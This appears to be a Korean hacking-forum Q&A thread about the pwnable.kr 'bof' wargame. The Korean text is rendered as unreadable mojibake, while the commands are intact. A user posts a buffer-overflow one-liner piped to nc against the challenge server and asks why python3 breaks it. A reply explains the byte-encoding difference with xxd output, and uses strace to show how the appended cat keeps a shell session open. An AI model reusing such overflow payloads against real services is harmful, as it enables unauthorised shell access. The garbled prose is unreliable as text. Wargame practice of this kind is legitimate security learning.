½Ã½ºÅÛ ÇØÅ·

 1574, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   hackxx123
   http://NULL
   pwnable.kr bof ¹®Á¦!!!

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1950 [º¹»ç]


½ºÅÃÀ» ÇϳªÇϳª ¼ÕÀ¸·Î ±×·Áº¸¸é¼­  ¿Ö ¿À¹öÇ÷ο찡 ¹ß»ýÇÏ´ÂÁö ±ú¿ìÃƽÀ´Ï´Ù. 52¹ÙÀÌÆ®¸¸Å­ ´õ¹Ì°ªÀ» ³Ö¾îÁÖ°í ¸¶Áö¸· 4¹ÙÀÌÆ®¿¡ ¿øÇÏ´Â Å°°ªÀ» ³Ö¾îÁÖ¸é Ç®¸®´Â ¹®Á¦Àä,, ±×·±µ¥,,,
ÆäÀ̷εå´Â (python -c "print('A'*52+'\xbe\xba\xfe\xca')";cat) | nc pwnable.kr 9000 Á¤´äÀÌ À̰ǵ¥ python3·Î´Â Á¤´äÀÌ ¾ÈÇ®¸³´Ï´Ù...
¹®¹ýÀº print¾Õ¿¡ ()¸¦ ³Ö°í ´ç¿¬È÷ ÇØÁᱸ¿ä µµµ¥Ã¼ ÀÌÇØ°¡ ¾ÈµÇ³×¿ä.. ¿Ö python3·Î´Â ¾ÈµÇ´Â°ÇÁö ±×¸®°í ÆÄÀ̽㠸í·ÉÀ» ÇØÁÖ°í ¸¶Áö¸·¿¡ ¿Ö ;cat ¸í·É¾î¸¦ ºÙÇôÁÖ´ÂÁö ¸ð¸£°Ú½À´Ï´Ù ; ´ÙÀ½ catÀÌ¸é ¿ÏÀü ºÐ¸®µÈ ¸í·É ¼öÇàÀΰɷΠ¾Æ´Âµ¥... ¿Ö Àú·¸°Ô ÇØÁÖ´ÂÁö.. ÀÎÅͳݿ¡ ³ª¿ÍÀÖ´Â Ç®À̸¦ ºÁµµ ¸ðµç±ÛÀÌ Àú ;catÀÌ ºÙÀº ÀÌÀ¯¸¦ ¾Ë·ÁÁÖÁö¸¦ ¾Ê³×¿ä.... Á¦¹ß ´©°¡ ¾Ë·ÁÁÖ¼¼¿ä ¤Ð¤Ð

  Hit : 2507     Date : 2018/12/12 12:09



    
cd80 ? ~ python2 -c 'print "\xbe\xba\xfe\xca"' | xxd -
00000000: beba feca 0a .....
? ~ python3 -c 'print("\xbe\xba\xfe\xca")' | xxd -
00000000: c2be c2ba c3be c38a 0a .........
? ~

À§ Â÷À̶§¹®¿¡ ¾ÈµÇ³ªº¸³×¿ä

catÀ» ºÙ¿©ÁÖ´Â ÀÌÀ¯´Â catÀ» ±×³É ½ÇÇàÇغ¸¸é
➜ ~ strace -if /bin/cat 2>&1 | grep -E "read|write"
[00007f384b2b2da4] read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
hi
[00007f384afb5081] read(0, "hi\n", 131072) = 3
[00007f384afb5154] write(1, "hi\n", 3hi
bye
[00007f384afb5081] read(0, "bye\n", 131072) = 4
[00007f384afb5154] write(1, "bye\n", 4bye
ÀÔ·ÂÇÑ°É ±×´ë·Î Ãâ·ÂÇÏ°í
cat) °ú nc »çÀÌÀÇ ÆÄÀÌÇÁ´Â ÆÄÀÌÇÁ ¿ÞÆíÀÇ stdoutÀ» ¿À¸¥ÆíÀÇ stdinÀ¸·Î ³Ö¾îÁÖ´Â ¿ªÇÒÀ̱⠶§¹®¿¡
¾Õ¿¡¼­ Ãâ·ÂÇÑ°ÍÀÌ bofÀÇ gets¿¡ µé¾î°¡ ½©ÀÌ ½ÇÇàµÇ°í ±× ÈÄ ¸í·ÉÀ» Ä¡±â À§ÇØ catÀ» ºÙ¿©¼­ ÀÔ·ÂÇϴ°͵éÀÌ ½©·Î Àü´ÞµÉ ¼ö ÀÖµµ·Ï ÇϱâÀ§ÇØ catÀ» ºÙÀÔ´Ï´Ù
2018/12/12  
DOP4MIN3 p_str = {Ãâ·Â ¹®ÀÚ¿­}.decode('utf-8') 2018/12/23  
1574   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
10/05 1207
1573   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
08/24 861
1572   libc°ü·Ã - 2[5]     lMaxl04
08/24 853
1571   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
06/29 1111
1570   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
06/16 915
1569   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
04/15 1695
1568   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
02/04 1425
1567   pwnable.kr echo1 Áú¹®[2]     turttle2s
06/17 1704
1566   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
06/16 1554
1565   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
07/18 1783
1564   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
07/18 3192
1563   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
05/31 1825
1562   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
04/01 1668
1561   »ç±â[2]     jas08
03/31 1960
1560   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
03/30 1710
1559   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
01/09 2249
1558   lob level19(nightmare) °ü·ÃÁú¹®[1]     dnjsdnwja
12/18 1720
1557   ftz level2 Áú¹®ÀÖ½À´Ï´Ù[1]     kihyun1998
12/13 1811
1556   ftz level2¹ø Ǫ´Âµ¥¿ä ±ÇÇÑÀÌ...     kihyun1998
12/06 1687
1555   ½Ã½ºÅÛÇØÅ·ÇÒ¶§ [3]     thsrhkdwns
12/05 2166
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org